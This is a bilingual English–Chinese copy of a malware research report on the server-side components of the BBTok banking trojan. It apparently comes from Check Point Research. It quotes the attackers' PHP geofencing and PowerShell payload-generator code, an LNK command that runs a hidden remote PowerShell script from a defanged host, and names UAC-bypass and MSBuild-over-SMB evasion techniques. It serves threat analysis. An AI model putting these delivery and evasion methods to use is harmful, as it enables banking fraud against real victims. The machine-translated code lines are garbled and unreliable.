BEHIND THE SCENES OF BBTOK: ANALYZING A BANKER’S SERVER SIDE COMPONENTS

Introduction 介绍

Check Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins). This resulting in low detection rates, even though BBTok banker operates at least since 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.
Check Point Research最近发现了一个活跃的活动，在拉丁美洲运营和部署BBTok银行家的新变种。在这项研究中，我们重点介绍了新发现的感染链，这些感染链使用独特的陆地二元体（LOLBins）组合。这导致检出率低，尽管BBTok银行家至少自2020年以来一直在运营。在我们分析活动时，我们遇到了攻击中使用的一些威胁参与者的服务器端资源，针对巴西和墨西哥的数百名用户。

The server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We’ve observed numerous iterations of the same server-side scripts and configuration files which demonstrate the evolution of the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.
服务器端组件负责提供可能通过网络钓鱼链接分发的恶意负载。我们已经观察到相同的服务器端脚本和配置文件的多次迭代，这些脚本和配置文件展示了BBTok银行家部署方法随时间推移的演变。这种洞察力使我们能够瞥见参与者尚未实施的感染媒介，并追踪用于维持此类操作的源代码的来源。

In this report, we highlight some of the server-side functionalities of the payload server which are used to distribute the banker. Those allow to generate unique payloads to each of the victims, generated upon a click.
在本报告中，我们重点介绍了有效负载服务器的一些服务器端功能，这些功能用于分发银行家。这些允许为每个受害者生成独特的有效载荷，点击后生成。

Key Findings 主要发现

1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure infected machines are from those countries only.
   BBTok继续活跃，针对巴西和墨西哥的用户，采用多层地理围栏来确保受感染的机器仅来自这些国家。
2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have evolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.
   自 2020 年上次公开报道 BBTok 以来，运营商的技术、战术和程序 （TTP） 发生了重大变化，增加了额外的混淆和下载层，导致检测率低。
3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number.
   BBTok银行家具有专用功能，可复制40多家墨西哥和巴西银行的界面，并诱骗受害者在其银行帐户中输入其2FA代码或输入其支付卡号。
4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique payloads for each victim based on operating system and location.
   新识别的有效负载由自定义服务器端应用程序生成，该应用程序负责根据操作系统和位置为每个受害者生成唯一的有效负载。
5. Analysis of payload server-side code revealed the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.
   对有效负载服务器端代码的分析显示，参与者正在积极维护不同版本的Windows的多样化感染链。这些链采用多种文件类型，包括ISO，ZIP，LNK，DOCX，JS和XLL。
6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g. Follina) to their arsenal.
   威胁行为者将开源代码、来自黑客论坛的代码以及出现的新漏洞（例如 Follina）添加到他们的武器库中。

Background 背景

The BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages to a wide variety of banks operating in Mexico and Brazil.
BBTok 银行家于 2020 年首次披露，通过无文件攻击部署在拉丁美洲。银行家具有广泛的功能，包括枚举和终止进程，键盘和鼠标控制以及操作剪贴板内容。除此之外，BBTok还包含经典的银行木马功能，模拟在墨西哥和巴西运营的各种银行的虚假登录页面。

Since it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing emails with attachments for the initial infection. Recently we’ve seen indications of the banker distributed through phishing links, and not as attachments to the email itself.
自首次公开披露以来，BBTok运营商采用了新的TTP，同时仍然主要使用带有附件的网络钓鱼电子邮件进行初始感染。最近，我们看到银行家通过网络钓鱼链接分发的迹象，而不是电子邮件本身的附件。

Upon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machines. Those contain an LNK file that kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the process appears to be quite straightforward upon first glimpse, we’ve found evidence that there’s a lot going on behind the scenes.
访问恶意链接后，ISO 或 ZIP 文件会下载到受害者的计算机上。这些包含一个LNK文件，该文件启动了感染链，导致在打开诱饵文件时部署银行家。虽然这个过程乍一看似乎很简单，但我们发现有证据表明幕后发生了很多事情。

While analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand with each click, tailored to match the victim’s operating system and location.
在分析这些新识别的链接时，我们发现了用于分发恶意软件的内部服务器端资源。看着这些，很明显，演员维护了更广泛的感染链，每次点击都会按需生成，并根据受害者的操作系统和位置量身定制。

BBTok Banking Hijacks BBTok银行劫持

BBTok enables its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotibank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows and names of browser tabs, searching for bank names.
BBTok为其运营商提供了广泛的功能，从远程命令到经典的银行木马功能。BBTok可以复制多家拉丁美洲银行的接口。其代码引用了墨西哥和巴西的40多家主要银行，如花旗银行，斯科蒂银行，伊陶银行和汇丰银行（有关目标银行的完整列表，请参阅附录B）。银行家通过遍历打开的窗口和浏览器选项卡的名称，搜索银行名称来搜索其受害者是这些银行客户的迹象。

The default target the banker apparently aims at is BBVA, with the default fake interface aiming to replicate its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code/ token number that serves as 2FA for bank account and to conduct account takeovers of victim’s bank account. In some cases, this capability also aims to trick the victim into entering his payment card number.
银行家的目标显然是BBVA，默认的假界面旨在复制其外观。这些虚假界面伪装成合法机构，诱使毫无戒心的用户泄露个人和财务详细信息。此功能的重点是诱骗受害者输入用作银行帐户 2FA 的安全代码/令牌号，并对受害者的银行帐户进行帐户接管。在某些情况下，此功能还旨在诱骗受害者输入他的支付卡号。

BBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to Banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.
BBTok是用Delphi编写的，它使用可视化组件库（VCL）来创建表单，从字面上看，这些表单构成了这些假接口。这允许攻击者动态自然地生成适合受害者计算机屏幕和受害者银行特定形式的界面，而不会引起怀疑。BBVA是银行家针对的默认银行，其界面以名为“TFRMBG”的形式存储。除了银行网站，攻击者还与时俱进，并开始在受感染的机器上搜索有关比特币的信息，积极寻找“比特币”、“轻钱包”和“币安”等字符串。

BBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, and likely to improve its capabilities to trick the victims. Those were not available during the time of analysis.
BBTok 并不止于视觉上的诡计;它还具有其他功能。具体来说，它可以安装恶意浏览器扩展程序或注入名为“rpp.dll”的DLL，以进一步控制受感染的系统，并可能提高其欺骗受害者的能力。在分析期间没有这些资料。

What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system.
值得注意的是运营商的谨慎态度：所有银行活动仅在其C2服务器的直接命令下执行，并且不会在每个受感染的系统上自动执行。

Payload Server Analysis 有效负载服务器分析

Overview of the Payload Server
负载服务器概述

To effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP archive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found within the request.
为了有效地管理他们的活动，BBTok运营商创建了一个独特的流程，由受害者单击恶意链接启动，该链接可能是在网络钓鱼电子邮件中发送的。当受害者单击该链接时，它会导致下载 ZIP 存档或 ISO 映像，具体取决于受害者的操作系统。尽管该过程对受害者来说是无缝的，但服务器会根据请求中找到的参数生成唯一的有效负载。

This process is carried out on a XAMPP-based server, and contains three essential components:
此过程在基于 XAMPP 的服务器上执行，包含三个基本组件：

1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.
   一个 PowerShell 脚本，用于处理有效负载准备，并包含用于创建诱饵存档的主要逻辑。
2. A PHP codebase and database designed to document and manage infections.
   一个PHP代码库和数据库，旨在记录和管理感染。
3. Auxiliary utilities that enhance the functionality of these components.
   增强这些组件功能的辅助实用程序。

This is the chain of events:
这是事件链：

1. A victim performs an HTTP request to either /baixar, /descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).
   受害者向 /baixar 或 执行 /descargar HTTP 请求 /descarga （这些路径表明引诱是西班牙语或葡萄牙语）。
2. Based on the .htaccess file, the server handles the request using descarga.php.
   根据 .htaccess 该文件，服务器使用 descarga.php .
3. The scripts utilize the file db.php to store information via an SQLite database about the request, including the victim’s fingerprint.
   脚本利用该文件 db.php 通过SQLite数据库存储有关请求的信息，包括受害者的指纹。
4. Descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.
   Descarga.php 调用 ps_gen.ps1 以生成自定义存档，该存档最终会传递给受害者。

Incoming Requests Handling
传入请求处理

The PHP codebase is composed of the following files:
PHP 代码库由以下文件组成：

1. descarga / descargar.php – Manages new connections and serves lure documents to the victim’s PC.
   descarga / descargar.php – 管理新连接并将诱饵文档提供给受害者的 PC。
2. db.php – Generates and manages the SQLite database that includes the victim’s details.
   db.php – 生成和管理包含受害者详细信息的 SQLite 数据库。
3. generator.php – Utility class used to generate random links, strings, and other functionalities.
   generator.php – 用于生成随机链接、字符串和其他功能的实用程序类。

“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.
“Descarga”和“descargar”在西班牙语中翻译为“下载”。此文件包含感染过程的主要逻辑。脚本本身包含许多注释，其中一些是简单的西班牙语和葡萄牙语，这些注释提供了有关攻击者来源的提示。

The script logic: 脚本逻辑：

1. It checks the geolocation of the link-referred victim against ip-api.com and stores it in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil) the HTTP connection ends immediately with a 404 message.
   它根据 ip-api.com 检查链接引用的受害者的地理位置，并将其存储在文件中。如果受害者不是来自目标国家/地区（即墨西哥或巴西），则 HTTP 连接会立即以 404 消息结束。

$api = new IpApi(); $api = 新的 IpApi（）;

$whoAmI = $api->GetInfo($ip);
$whoAmI = $api->获取信息（$ip）;

$allowed = array(“MX”, “BR”);
$allowed = array（“MX”， “BR”）;

file_put_contents(“ips/”.$ip.$whoAmI->countryCode, “”);
file_put_contents（“ips/”.$ip.$whoAmI->国家代码， “”）;

if(!in_array($whoAmI->countryCode, $allowed)) {
if（！in_array（$whoAmI->countryCode， $allowed）） {

http_response_code(404);
http_response_code（404）;

die();
死（）;

}

2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.
2. 如果受害者通过检查，脚本会解析用户代理以获取受害者的 Windows 操作系统版本。

$useragent = strtolower(htmlspecialchars($_SERVER[‘HTTP_USER_AGENT’]));
$useragent = strtolower（htmlspecialchars（$_SERVER[‘HTTP_USER_AGENT’]））;

$match = false; $match = 假;

$dfile = “10”; $dfile = “10”;

$dfiles = array ( $dfiles = 数组 （

‘windows nt 10.0’ => ’10’,
‘Windows NT 10.0’ => ’10’，

‘windows nt 6.3’ => ’10’,
‘Windows NT 6.3’ => ’10’，

‘windows nt 6.2’ => ’10’,
‘Windows NT 6.2’ => ’10’，

‘windows nt 6.1’ => ‘7’,
‘Windows NT 6.1’ => ‘7’，

‘windows nt 6.0’ => ‘7’,
‘Windows NT 6.0’ => ‘7’，

‘windows nt 5.2’ => ‘7’
‘Windows NT 5.2’ => ‘7’

);

foreach($dfiles as $os=>$file) {
foreach（$dfiles as $os=>$file） {

if (preg_match(‘/’ . $os . ‘/i’, $useragent)) {
如果 （preg_match（’/’ . $os .’/i’， $useragent）） {

$match = true;
$match = 真;

$dfile = $file;
$dfile = $file;

break;
破;

}

}

3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload generator script.
3.然后，它将带有受害者国家/地区代码的用户代理传递到PowerShell有效负载生成器脚本。

PowerShell Payload Generator
动力外壳有效载荷生成器

The script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.
该脚本 ps_gen.ps1 包含用于生成存档有效负载（作为 ZIP 或 ISO 文件）的主要逻辑。最新版本的代码有很多注释掉的部分，这些部分在过去可能起作用，这表明它们包含额外的感染链和诱饵。我们发现了该文件的多个版本，其中一些版本可以追溯到 2022 年 7 月，这表明此操作已经进行了相当长的一段时间。

Our analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions.”
我们对最新版本的分析如下。有关脚本的早期变体和随时间推移的更改的更多详细信息，请参阅“早期版本”部分。

The generator script is called by descarga.php, using the function DownloadFile with the arguments file_name, ver and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.
生成器脚本由 调用 descarga.php ，使用带有参数 file_name 的函数 DownloadFile ， ver 并且 cc. 这些对应于生成的存档名称、受害者的操作系统版本和受害者的国家/地区代码。

function DownloadFile($file_name, $ver, $cc) {
函数下载文件（$file_名称， $ver， $cc） {

if($ver == “10” )
if（$ver == “10” ）

{

$ext = “iso”;
$ext = “iso”;

} else {
} else {

$ext = “zip”;
$ext = “zip”;

}

exec(‘powershell -ex Bypass -File ./ps_gen.ps1 ‘.$file_name.‘ ‘.$ver.‘ ‘.$cc);
exec（’powershell -ex Bypass -File ./ps_gen.ps1 ‘.$file_name.”“.$ver。” “.$cc）;

return $file_name.‘.’.$ext;
返回$file_名称”。$ext;

}

The code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:
在观察到的服务器迭代中使用的代码部分基于两个参数生成存档有效负载：

1. The origin country of the victim – Brazil or Mexico.
   受害者的原籍国——巴西或墨西哥。
2. Operating System extracted from the User-Agent – Windows 10 or 7.
   从用户代理中提取的操作系统 – Windows 10 或 7。

According to the results, the following parameters of the malicious archive are selected:
根据结果，选择恶意存档的以下参数：

1. Type of the archive: ISO for Windows 10, ZIP for Windows 7, and others.
   存档类型：Windows 10 的 ISO、Windows 7 的 ZIP 等。
2. The name of the DLL file that is used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.
   下一阶段中使用的 DLL 文件的名称会根据目标国家/地区而更改： Trammy 用于巴西， Gammy 用于墨西哥。
3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one for Windows 7 is used by Google Chrome.
   存档包含一个 LNK。Windows 10中的LNK快捷方式图标是Microsoft Edge使用的，Windows 7中的快捷方式图标是Google Chrome使用的。
4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.
   最终执行逻辑。对于Windows 10受害者，该脚本使用从服务器 216[.]250[.]251[.]196 命名 dat.xml 的文件执行MSBuild.exe该文件还存储下一阶段的恶意DLL。对于Windows 7，有效负载只是通过CMD执行下载相关的远程DLL。

$shortcutName = $args[0]

$win = $args[1]

$country = $args[2]

$stegoKey = New-StegoKey 35
$stegoKey = 新剑钥匙 35

if($country -eq “BR”) { if（$country -eq “BR”） {

$dllName = ‘Trammy’
$dllName = “电车”

} else {

$dllName = ‘Gammy’
$dllName = “Gammy”

}

if($win -eq “10”) { if（$win -eq “10”） {

$wstate = 7
$wstate = 7

$shortcutIconLocation = “C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe”
$shortcutIconLocation = “C：\Program Files （x86）\Microsoft\Edge\Application\msedge.exe”

CopyMSBuild($shortcutName)
CopyMSBuild（$shortcutName）

} else {

$wstate = 7
$wstate = 7

$shortcutIconLocation = “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe”
$shortcutIconLocation = “C：\Program Files （x86）\Google\Chrome\Application\chrome.exe”

}

Add-PoshObfuscation 添加混淆

All payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:
所有有效负载都使用 Add-PoshObfuscation 函数进行模糊处理。对部分代码的简单搜索会从“良性”站点hackforums中产生一个结果。网，特别是 2021 年 8 月一位名为“Qismon”的用户的回应。此人推荐了一些绕过 AMSI 和安全产品的方法，并分享了 PoshObfuscation 代码：

Infection Chains and Final Payload
感染链和最终有效载荷

The process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.
上述过程最终会导致感染链的两种变体：一种用于Windows 7，另一种用于Windows 10。两个版本之间的差异可以解释为试图避免新实现的检测机制，如 AMSI。

*ammy.dll Downloaders *阿米.dll下载器

Both infection chains utilize malicious DLLs named using a similar convention – Trammy, Gammy, Brammy, or Kammy. The latter are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected software. These allow the actors full access to the infected machine, and additional functionalities.
两个感染链都使用使用类似约定命名的恶意 DLL – Trammy 、 Gammy 、 Brammy 或 Kammy 。后者是BBTok加载程序的精简和混淆版本，在执行任何恶意操作之前使用地理围栏来阻止检测。最终的有效载荷是BBTok银行家的新版本。如前所述，BBTok附带了多个其他受密码保护的软件。这些允许参与者完全访问受感染的计算机和其他功能。

Windows 7 Infection Chain
视窗 7 感染链

The infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.
Windows 7的感染链不是唯一的，由存储在ZIP文件中的LNK文件组成。执行后，LNK 文件使用 运行 *ammy.dll 有效负载，进而下载、提取和 rundll32.exe 运行 BBTok 有效负载。

Windows 10 Infection Chain
视窗 10 感染链

The infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:
Windows 10 的感染链存储在包含 3 个组件的 ISO 文件中：LNK 文件、诱饵文件和重命名的 cmd.exe可执行文件。单击 LNK 文件将启动感染链，使用重命名的 cmd.exe 以以下方式运行所有命令：

The infection chain: 感染链：

1. Copy the lure file to the folder %userprofile% and open it.
   将诱饵文件复制到文件夹 %userprofile% 并打开它。

2. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched over SMB.
   运行 MSBuild.exe 以使用存储在远程服务器上的 XML（通过 SMB 提取）生成应用程序。
3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe(mmd.exe), as seen in the XML contents:
   MSBuild.exe 创建一个随机命名的 DLL，该 DLL 又从服务器下载 *ammy.dll 并使用重命名 rundll32.exe 的 （ mmd.exe ） 运行它，如 XML 内容所示：

4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.
   *ammy.dll下载器下载，提取并运行BBTok有效负载。

The unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.
重命名的 CMD、MSBuild 和通过 SMB 提取文件的独特组合导致 Windows 10 感染链的检测率较低。

Earlier Versions 早期版本

Throughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.
在我们对BBTok活动的分析中，我们遇到了来自有效负载服务器的多个版本的工件。我们看到了操作的所有部分的变化：PHP代码，PowerShell脚本和其他实用程序。

Changes in the PHP Code
PHP 代码中的更改

Looking at an earlier version of the descarga.php script, we saw a few key differences:
查看脚本的 descarga.php 早期版本，我们看到了一些关键差异：

1. Originally, only victims from Mexico were targeted.
   最初，只有来自墨西哥的受害者成为目标。
2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.
   其他有效负载服务器的 176[.]31[.]159[.]196 IP 在脚本中进行了硬编码。
3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.
   不是直接执行 PowerShell 脚本，而是调用了一个名为的 gen.php 脚本。我们无法获得此脚本，但相信它只是执行了PowerShell脚本。
4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database, using the db.php file. The flag is later checked to not serve the same payload twice.
   受害者的IP地址，用户代理和标志（ jaBaixou 葡萄牙语中“已下载”）入到数据库中，使用 db.php 该文件。稍后会检查该标志，使其不会两次提供相同的有效负载。

As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.
由于此部分未在最新版本中使用，因此攻击者可能会发现此过程很麻烦，并决定交换OPSEC以获得更轻松的管理和更高的感染成功机会。

Modifications of the PowerShell Script
PowerShell 脚本的修改

Looking at older versions of the PowerShell script, it was clear that numerous changes were done to the payload and execution chain. Some noteworthy ones include:
查看旧版本的PowerShell脚本，很明显对有效负载和执行链进行了大量更改。一些值得注意的包括：

1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1.
   在脚本的最早版本中，LNK 只是运行带有参数 -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1 的 PowerShell 脚本。
2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.
   后来的更新添加了诱饵PDF（ fac.pdf “fac”是“factura”的缩写，在葡萄牙语中是“发票”）。这是来自墨西哥科利马县的西班牙语合法收据。此外，Windows 7受害者的有效载荷启动了一个合法的墨西哥政府网站。 hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html
3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and changes the name of the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.
   我们发现的最新版本打开了一个不同的合法网站， hxxps://fazenda[.]gov[.]br 一个巴西政府网站。此版本还会更改 MSBuild 使用的 XML 文件，并将为巴西目标保留的 DLL 的名称从 Brammy.dll 更改为 Trammy.dll 。

Unused Code and Infection Vectors
未使用的代码和感染媒介

Certain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:
PowerShell 脚本中的某些代码部分未使用，并且服务器托管的文件不属于我们讨论的主要感染流。特别是，我们没有发现任何主动使用以下药物的迹象：

1. ze.docx is a document that exploits the Follina CVE (2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.
   ze.docx 是利用 Follina CVE （2022-30190） 的文档。它在 PowerShell 脚本中名为 CreateDoc 的函数中引用。
2. xll.xll, which is referenced by CreateXLL, is a malicious xll taken from the open-source project https://github.com/moohax/xllpoc, which implements code execution via Excel.
   xll.xll ，由 引用 CreateXLL ，是从开源项目 https://github.com/moohax/xllpoc 中获取的恶意 XLL，它通过 Excel 实现代码执行。
3. Numerous empty JavaScript files were found on the server, likely to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.
   在服务器上发现了许多空的 JavaScript 文件，这些文件可能被名为 CreateJS 的函数使用。函数中引用的文件 b.js 为 空，因此不清楚此函数以前是使用过还是从未完全实现。
4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:
   服务器上有多个蝙蝠文件，每个文件都有不同的下载下一阶段实现。这些很可能是由一个名为 CreateBat 的函数创建的，该函数在最新版本的 PowerShell 脚本中被注释掉。它们中的大多数与我们之前分析的 ByFD 函数中的代码几乎相同，不包括两个值得注意的过去迭代：
   1. The oldest bat file downloaded another PowerShell script as a next stage (which wasn’t publicly available anymore) instead of editing the registry;
      最古老的蝙蝠文件下载了另一个PowerShell脚本作为下一阶段（不再公开可用），而不是编辑注册表;
   2. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one which is currently being used.
      后来的 bat 文件使用了 fodhelper UAC 旁路，而不是当前正在使用的计算机默认值。

Victimology and Attribution
受害者学和归因

Our analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language and the names of the 4 rows:
我们对服务器端组件的分析还揭示了从威胁参与者方面看到的最新活动之一，该活动基于我们发现的数据库，该数据库记录了对恶意应用程序的访问。数据库已命名 links.sqlite ，非常简单。它包含 150 多个条目，所有条目都是唯一的，表标题对应于由 创建的 db.php 条目。请注意葡萄牙语的使用和 4 行的名称：

1. chave, or key;  chave 或键;
2. assunto, or subject;  assunto 或主题;
3. user_agent ;
4. baixou, or downloaded.
   baixou ，或已下载。

The column named chave contained the IP addresses of the victims, and the column assunto was empty:
名为 chave 的列包含受害者的 IP 地址，该列 assunto 为空：

As the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates that with a high probability the threat actors are Brazilians, which is known for its active banking malware eco-system.
由于服务器代码从未被威胁行为者以外的任何人看到，并且它包含大量葡萄牙语评论，我们相信这表明威胁行为者很可能是巴西人，巴西人以其活跃的银行恶意软件生态系统而闻名。

Conclusion 结论

Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.
尽管BBTok由于其难以捉摸的技术并且仅在墨西哥和巴西针对受害者而能够保持低调，但很明显它仍在积极部署。由于其众多功能，以及涉及LNK文件，SMB和MSBuild的独特而创造性的交付方法，它仍然对该地区的组织和个人构成危险。

It is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.
安全研究人员很少能近距离观察攻击者的工作台，更难得的是瞥见它随着时间的推移而演变。我们所看到的情况强化了我们的信念，即所有威胁行为者，包括出于经济动机的威胁行为者，都在不断发展和改进他们的方法，并遵循新的安全趋势并尝试新的想法和机会。为了跟上并防止未来的攻击，安全研究人员也必须这样做。

Check Point Protections 检查点保护

Check Point Threat Emulation:
检查点威胁仿真：

• Banker.Wins.BBTok.A 银行家.赢.BBTok.A
• Banker.Win.BBTok.B 银行家.赢.BBTok.B
• Technique.Wins.SuxXll.A 技术.胜利.SuxXll.A
• Trojan.Win.XllAddings.A Trojan.Win.XllAddings.A

Harmony Endpoint: 和谐端点：

• Trojan.Win.Generic.AQ Trojan.Win.Generic.AQ
• Trojan.Win.Generic.AR Trojan.Win.Generic.AR

Appendix A – IOCs
附录 A – 国际奥委会

Files 文件

Network Indicators 网络指标

Appendix B – List of Targeted Banks
附录B – 目标银行名单

原文始发于cp<r>：BEHIND THE SCENES OF BBTOK: ANALYZING A BANKER’S SERVER SIDE COMPONENTS